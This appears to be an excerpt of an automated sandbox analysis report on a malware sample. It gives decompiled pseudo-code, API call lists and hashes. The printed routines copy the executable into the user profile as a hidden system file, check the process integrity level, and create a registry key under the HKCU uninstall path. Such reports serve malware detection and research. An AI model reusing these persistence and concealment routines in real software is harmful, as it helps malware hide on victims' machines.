                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$lstrcat$CloseVirtuallstrlen$CreateProcess$AllocChangeDirectoryFindFirstFreeHandleModuleNameNotificationProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
                                                                                                                                                                                                                                                                                                        • String ID: %s\%s.exe$USERPROFILE$pigalicapi
                                                                                                                                                                                                                                                                                                        • API String ID: 560841407-4090404022
                                                                                                                                                                                                                                                                                                        • Opcode ID: d5d8b7378ef743f007312c818edffbb4ef282e82611c05111bfa373c5cb79892
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5a1df65dd39d11d2feffdc598e8508d5089156913625d6b4e9fa29ff03a3d0d3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5d8b7378ef743f007312c818edffbb4ef282e82611c05111bfa373c5cb79892
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66515FB4944208BBFB14DF60DC59FEA7774EB44709F048168FA097A2C1D778AA81CF94
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 765 4001120-4001134 766 400113a-400113e 765->766 767 40012bb-40012c1 765->767 766->767 768 4001144-4001150 lstrlenA 766->768 768->767 769 4001156-4001162 lstrlenA 768->769 769->767 770 4001168-4001175 769->770 771 4001177-4001188 GetAllUsersProfileDirectoryA 770->771 772 400118a-400119b GetEnvironmentVariableA 770->772 773 40011a1-40011d9 wnsprintfA lstrcmpiA 771->773 772->773 774 4001216-4001287 call 40097a0 lstrcpyA * 2 CreateThread 773->774 775 40011db-40011e1 773->775 779 40012a3-40012b8 call 40097c0 774->779 780 4001289-400128d 774->780 775->774 776 40011e3-4001210 CopyFileA SetFileAttributesA lstrcpyA 775->776 776->774 779->767 781 400129a-40012a1 780->781 782 400128f-4001298 780->782 781->767 782->781
                                                                                                                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                                        			E04001120(CHAR* _a4, CHAR* _a8, signed int _a12, signed char _a16, void** _a20) {
                                                                                                                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                                                                                                                        				void* _v288;
                                                                                                                                                                                                                                                                                                        				char _v556;
                                                                                                                                                                                                                                                                                                        				void* _v560;
                                                                                                                                                                                                                                                                                                        				void* _v564;
                                                                                                                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && lstrlenA(_a4) != 0 && lstrlenA(_a8) != 0) {
                                                                                                                                                                                                                                                                                                        					_v12 = 0x104;
                                                                                                                                                                                                                                                                                                        					if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						GetEnvironmentVariableA("USERPROFILE",  &_v284, 0x104);
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						__imp__GetAllUsersProfileDirectoryA( &_v284,  &_v12);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					wnsprintfA( &_v556, 0x103, "%s\\%s.exe",  &_v284, _a8);
                                                                                                                                                                                                                                                                                                        					if(lstrcmpiA(_a4,  &_v556) != 0 && (_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						CopyFileA(_a4,  &_v556, 0); // executed
                                                                                                                                                                                                                                                                                                        						SetFileAttributesA( &_v556, 6); // executed
                                                                                                                                                                                                                                                                                                        						lstrcpyA(_a4,  &_v556);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v560 = E040097A0(0x30d);
                                                                                                                                                                                                                                                                                                        					_v16 = _v560;
                                                                                                                                                                                                                                                                                                        					 *((char*)(_v16 + 0x30c)) = _a12;
                                                                                                                                                                                                                                                                                                        					lstrcpyA(_v16,  &_v556);
                                                                                                                                                                                                                                                                                                        					lstrcpyA(_v16 + 0x208, _a8);
                                                                                                                                                                                                                                                                                                        					_t58 = CreateThread(0, 0, E040012D0, _v16, 0, 0); // executed
                                                                                                                                                                                                                                                                                                        					_v288 = _t58;
                                                                                                                                                                                                                                                                                                        					if(_v288 == 0) {
                                                                                                                                                                                                                                                                                                        						_v564 = _v16;
                                                                                                                                                                                                                                                                                                        						E040097C0(_v564);
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						if(_a20 != 0) {
                                                                                                                                                                                                                                                                                                        							 *_a20 = _v288;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v8 = 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}












                                                                                                                                                                                                                                                                                                        0x04001129
                                                                                                                                                                                                                                                                                                        0x04001134
                                                                                                                                                                                                                                                                                                        0x04001168
                                                                                                                                                                                                                                                                                                        0x04001175
                                                                                                                                                                                                                                                                                                        0x0400119b
                                                                                                                                                                                                                                                                                                        0x04001177
                                                                                                                                                                                                                                                                                                        0x04001182
                                                                                                                                                                                                                                                                                                        0x04001182
                                                                                                                                                                                                                                                                                                        0x040011bd
                                                                                                                                                                                                                                                                                                        0x040011d9
                                                                                                                                                                                                                                                                                                        0x040011f0
                                                                                                                                                                                                                                                                                                        0x040011ff
                                                                                                                                                                                                                                                                                                        0x04001210
                                                                                                                                                                                                                                                                                                        0x04001210
                                                                                                                                                                                                                                                                                                        0x04001223
                                                                                                                                                                                                                                                                                                        0x0400122f
                                                                                                                                                                                                                                                                                                        0x04001238
                                                                                                                                                                                                                                                                                                        0x04001249
                                                                                                                                                                                                                                                                                                        0x0400125d
                                                                                                                                                                                                                                                                                                        0x04001274
                                                                                                                                                                                                                                                                                                        0x0400127a
                                                                                                                                                                                                                                                                                                        0x04001287
                                                                                                                                                                                                                                                                                                        0x040012a6
                                                                                                                                                                                                                                                                                                        0x040012b3
                                                                                                                                                                                                                                                                                                        0x04001289
                                                                                                                                                                                                                                                                                                        0x0400128d
                                                                                                                                                                                                                                                                                                        0x04001298
                                                                                                                                                                                                                                                                                                        0x04001298
                                                                                                                                                                                                                                                                                                        0x0400129a
                                                                                                                                                                                                                                                                                                        0x0400129a
                                                                                                                                                                                                                                                                                                        0x04001287
                                                                                                                                                                                                                                                                                                        0x040012c1

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 04001148
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0400115A
                                                                                                                                                                                                                                                                                                        • GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 04001182
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040097C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 040097CF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040097C0: HeapFree.KERNEL32(00000000), ref: 040097D6
                                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 0400119B
                                                                                                                                                                                                                                                                                                        • wnsprintfA.SHLWAPI ref: 040011BD
                                                                                                                                                                                                                                                                                                        • lstrcmpiA.KERNEL32(00000104,?), ref: 040011D1
                                                                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000104,?,00000000), ref: 040011F0
                                                                                                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000006), ref: 040011FF
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(00000104,?), ref: 04001210
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(00000000,?), ref: 04001249
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(-00000208,00000000), ref: 0400125D
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 04001274
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
                                                                                                                                                                                                                                                                                                        • String ID: %s\%s.exe$USERPROFILE
                                                                                                                                                                                                                                                                                                        • API String ID: 1231128424-1744756051
                                                                                                                                                                                                                                                                                                        • Opcode ID: b85ef1de13e11c0e00b9ed9ca29e0f6effca0754590a52f5089cd6d741d3fe99
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5a94151192094d4d6073c3e413aca9132142fa07401a96dcdce05a8263d9ef35
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b85ef1de13e11c0e00b9ed9ca29e0f6effca0754590a52f5089cd6d741d3fe99
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A413675904208ABEB54CFA4D889BDE77B4EF48704F00C295F509AA281D779EA84CF91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                                                                                                                                                        			E040099F0() {
                                                                                                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                        				char _v9;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char _v1044;
                                                                                                                                                                                                                                                                                                        				char _v2068;
                                                                                                                                                                                                                                                                                                        				long _v2072;
                                                                                                                                                                                                                                                                                                        				void* _v2076;
                                                                                                                                                                                                                                                                                                        				void* _v2080;
                                                                                                                                                                                                                                                                                                        				char _v2084;
                                                                                                                                                                                                                                                                                                        				int _t43;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v9 = 0;
                                                                                                                                                                                                                                                                                                        				_v8 = 0x400;
                                                                                                                                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v16) == 0) {
                                                                                                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                                                                                                        					return _v9;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v2072 = 0;
                                                                                                                                                                                                                                                                                                        				GetTokenInformation(_v16, 1, 0, 0,  &_v2072); // executed
                                                                                                                                                                                                                                                                                                        				if(_v2072 >= 0x400) {
                                                                                                                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                                                                                                                        					CloseHandle(_v16);
                                                                                                                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v2076 =  &_v1044;
                                                                                                                                                                                                                                                                                                        				_t43 = GetTokenInformation(_v16, 1, _v2076, _v2072,  &_v2072); // executed
                                                                                                                                                                                                                                                                                                        				if(_t43 == 0) {
                                                                                                                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v2080 =  &_v2068;
                                                                                                                                                                                                                                                                                                        				_v2084 = 0x44;
                                                                                                                                                                                                                                                                                                        				__imp__CreateWellKnownSid(0xc, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                                        				if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                                        					__imp__CreateWellKnownSid(0x16, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                                        					if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                                        						__imp__CreateWellKnownSid(0x17, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                                        						if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                                        							__imp__CreateWellKnownSid(0x18, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                                        							if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                                        								goto L11;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return 1;
                                                                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                                                                        0x040099f9
                                                                                                                                                                                                                                                                                                        0x040099fd
                                                                                                                                                                                                                                                                                                        0x04009a19
                                                                                                                                                                                                                                                                                                        0x04009b80
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04009b80
                                                                                                                                                                                                                                                                                                        0x04009a1f
                                                                                                                                                                                                                                                                                                        0x04009a3a
                                                                                                                                                                                                                                                                                                        0x04009a4a
                                                                                                                                                                                                                                                                                                        0x04009b76
                                                                                                                                                                                                                                                                                                        0x04009b7a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04009b7a
                                                                                                                                                                                                                                                                                                        0x04009a56
                                                                                                                                                                                                                                                                                                        0x04009a77
                                                                                                                                                                                                                                                                                                        0x04009a7f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04009a8b
                                                                                                                                                                                                                                                                                                        0x04009a91
                                                                                                                                                                                                                                                                                                        0x04009aad
                                                                                                                                                                                                                                                                                                        0x04009acb
                                                                                                                                                                                                                                                                                                        0x04009ae6
                                                                                                                                                                                                                                                                                                        0x04009b04
                                                                                                                                                                                                                                                                                                        0x04009b1c
                                                                                                                                                                                                                                                                                                        0x04009b3a
                                                                                                                                                                                                                                                                                                        0x04009b52
                                                                                                                                                                                                                                                                                                        0x04009b70
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04009b72
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04009b3c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04009b06
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?), ref: 04009A0A
                                                                                                                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 04009A11
                                                                                                                                                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04009A3A
                                                                                                                                                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 04009A77
                                                                                                                                                                                                                                                                                                        • CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 04009AAD
                                                                                                                                                                                                                                                                                                        • EqualSid.ADVAPI32(?,00000000), ref: 04009AC3
                                                                                                                                                                                                                                                                                                        • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 04009AE6
                                                                                                                                                                                                                                                                                                        • EqualSid.ADVAPI32(?), ref: 04009AFC
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 04009B7A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                                                                        • String ID: D
                                                                                                                                                                                                                                                                                                        • API String ID: 98007406-2746444292
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7ae4063a6f13a9051a7762c6ae15c07f15253da6e1139fe1377935b2c4657608
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB41F0B5A042189BEB24DF90CC45FDAB3FDFF48700F04C1E4A549A6181DE74AA81DFA1
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04005A00(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				int _v20;
                                                                                                                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                                                                                                                        				CHAR* _t35;
                                                                                                                                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                                                                                                                                        				long _t43;
                                                                                                                                                                                                                                                                                                        				CHAR* _t51;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 > 0x10) {
                                                                                                                                                                                                                                                                                                        					E04007D20(_t27, "Mzsrkvcweomac", 0, 0xe);
                                                                                                                                                                                                                                                                                                        					lstrcpyA("Mzsrkvcweomac", "WDefault");
                                                                                                                                                                                                                                                                                                        					_t33 = E04005930(_a4 + 0x45b, "Mzsrkvcweomac", 0xd); // executed
                                                                                                                                                                                                                                                                                                        					E04007D20(_t33, _a8, 0, _a12);
                                                                                                                                                                                                                                                                                                        					_t35 =  *0x401189c; // 0x400c4e0
                                                                                                                                                                                                                                                                                                        					if(lstrlenA(_t35) < _a12) {
                                                                                                                                                                                                                                                                                                        						_t51 =  *0x401189c; // 0x400c4e0
                                                                                                                                                                                                                                                                                                        						lstrcpyA(_a8, _t51);
                                                                                                                                                                                                                                                                                                        						_t39 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                                                        						if(_t39 + lstrlenA(?str?) < _a12) {
                                                                                                                                                                                                                                                                                                        							lstrcatA(_a8, "Mzsrkvcweomac");
                                                                                                                                                                                                                                                                                                        							_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                                        							_v16 = 0;
                                                                                                                                                                                                                                                                                                        							_v20 = 0;
                                                                                                                                                                                                                                                                                                        							_t43 = RegCreateKeyExA(_v12, _a8, 0, 0, 0, 0x20006, 0,  &_v16,  &_v20); // executed
                                                                                                                                                                                                                                                                                                        							if(_t43 != 0) {
                                                                                                                                                                                                                                                                                                        								E04007D20(_t43, _a8, 0, _a12);
                                                                                                                                                                                                                                                                                                        								lstrcpyA(_a8, "software\\microsoft\\windows\\currentversion\\uninstall");
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v8 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                                                                        0x04005a07
                                                                                                                                                                                                                                                                                                        0x04005a12
                                                                                                                                                                                                                                                                                                        0x04005a35
                                                                                                                                                                                                                                                                                                        0x04005a47
                                                                                                                                                                                                                                                                                                        0x04005a5d
                                                                                                                                                                                                                                                                                                        0x04005a6f
                                                                                                                                                                                                                                                                                                        0x04005a77
                                                                                                                                                                                                                                                                                                        0x04005a86
                                                                                                                                                                                                                                                                                                        0x04005a8c
                                                                                                                                                                                                                                                                                                        0x04005a97
                                                                                                                                                                                                                                                                                                        0x04005aa1
                                                                                                                                                                                                                                                                                                        0x04005ab9
                                                                                                                                                                                                                                                                                                        0x04005ac8
                                                                                                                                                                                                                                                                                                        0x04005ace
                                                                                                                                                                                                                                                                                                        0x04005ad5
                                                                                                                                                                                                                                                                                                        0x04005adc
                                                                                                                                                                                                                                                                                                        0x04005b00
                                                                                                                                                                                                                                                                                                        0x04005b08
                                                                                                                                                                                                                                                                                                        0x04005b20
                                                                                                                                                                                                                                                                                                        0x04005b31
                                                                                                                                                                                                                                                                                                        0x04005b0a
                                                                                                                                                                                                                                                                                                        0x04005b0e
                                                                                                                                                                                                                                                                                                        0x04005b0e
                                                                                                                                                                                                                                                                                                        0x04005b41
                                                                                                                                                                                                                                                                                                        0x04005b41
                                                                                                                                                                                                                                                                                                        0x04005ab9
                                                                                                                                                                                                                                                                                                        0x04005a86
                                                                                                                                                                                                                                                                                                        0x04005b4b

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(Mzsrkvcweomac,WDefault), ref: 04005A47
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005930: CharUpperA.USER32(00000000), ref: 040059E2
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(0400C4E0), ref: 04005A7D
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(00000000,0400C4E0), ref: 04005A97
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 04005AA1
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(Mzsrkvcweomac), ref: 04005AAE
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,Mzsrkvcweomac), ref: 04005AC8
                                                                                                                                                                                                                                                                                                        • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 04005B00
                                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 04005B0E
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 04005B31
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 04005B3B
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
                                                                                                                                                                                                                                                                                                        • String ID: Mzsrkvcweomac$WDefault$software\microsoft\windows\currentversion\uninstall
                                                                                                                                                                                                                                                                                                        • API String ID: 4161867159-2878899710
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6328766250843c22953127ee7e5734f8e2de0c08094b4a1cb46197edb91ced3c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2f1465acc8a4d9a659e2af8a658b36752d7f83b1b7b92a7dc582af9786930c23
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6328766250843c22953127ee7e5734f8e2de0c08094b4a1cb46197edb91ced3c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40310775600208FBEB14DFA4DC49FAA37B9EB44708F04C615FA15BB281D7B8AA50CF50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32 ref: 0041033E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00410280: fprintf.MSVCRT ref: 004102C0
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00410372
                                                                                                                                                                                                                                                                                                        • CreateEventA.KERNEL32 ref: 0041039A
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 004103D9
                                                                                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 004103DE
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 004103E6
                                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE ref: 00410415
                                                                                                                                                                                                                                                                                                        • GetThreadPriority.KERNEL32 ref: 0041042C
                                                                                                                                                                                                                                                                                                        • TlsSetValue.KERNEL32 ref: 0041045E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: strlen.NTDLL ref: 0041433F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: memcpy.NTDLL ref: 0041438D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: CreateMutexA.KERNEL32 ref: 004143F5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040F2D5), ref: 00414410
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: FindAtomA.KERNEL32 ref: 00414421
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: malloc.MSVCRT ref: 00414439
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: AddAtomA.KERNEL32 ref: 00414463
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: free.MSVCRT ref: 0041448D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414495
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: CloseHandle.KERNEL32 ref: 004144A1
                                                                                                                                                                                                                                                                                                        • abort.MSVCRT ref: 004104E4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
